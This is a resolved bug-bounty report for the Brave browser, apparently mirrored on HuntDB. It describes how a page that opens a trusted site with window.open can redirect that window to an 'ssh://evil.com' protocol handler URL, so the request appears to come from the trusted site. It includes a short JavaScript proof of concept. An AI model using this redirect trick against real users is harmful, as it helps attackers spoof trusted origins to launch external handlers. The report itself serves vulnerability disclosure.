Loading HuntDB...

Navigation to protocol handler URL from the opened page displayed as a request from this page.

Medium
B
Brave Software
Submitted None
Reported by metnew

Vulnerability Details

Technical details and impact analysis

## Summary: Navigation to protocol handler URL from the page opened using `window.open` is considered as a request from the opened page. Example: 1. The page opens `google.com` 2. The page changes opened window's location to `ssh://evil.com` 3. Request to open `ssh://evil.com` URL displayed at `google.com` **Combining this vulnerability with #369185 makes the attack scenario in #369218 more available.** ## Products affected: Brave: 0.23.19 V8: 6.7.288.46 rev: 178c3fbc045a0cbdbe098db08307503cce952081 Muon: 7.1.3 OS Release: 17.6.0 Update Channel: Release OS Architecture: x64 OS Platform: macOS Node.js: 7.9.0 Tor: 0.3.3.7 (git-035a35178c92da94) Brave Sync: v1.4.2 libchromiumcontent: 67.0.3396.87 ## Steps To Reproduce: PoC: ``` html <script> window.onclick = () => { w = window.open("https://google.com") setTimeout(() => { t = w.location.replace('ssh://evil.com'); }, 1000) } </script> ``` ## Supporting Material/References: Screencast + PoC attached. ## Impact An attacker could trick a user to open protocol handler from a trusted site. **Combining this with #369185 makes the attack scenario in #369218 more available.**

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted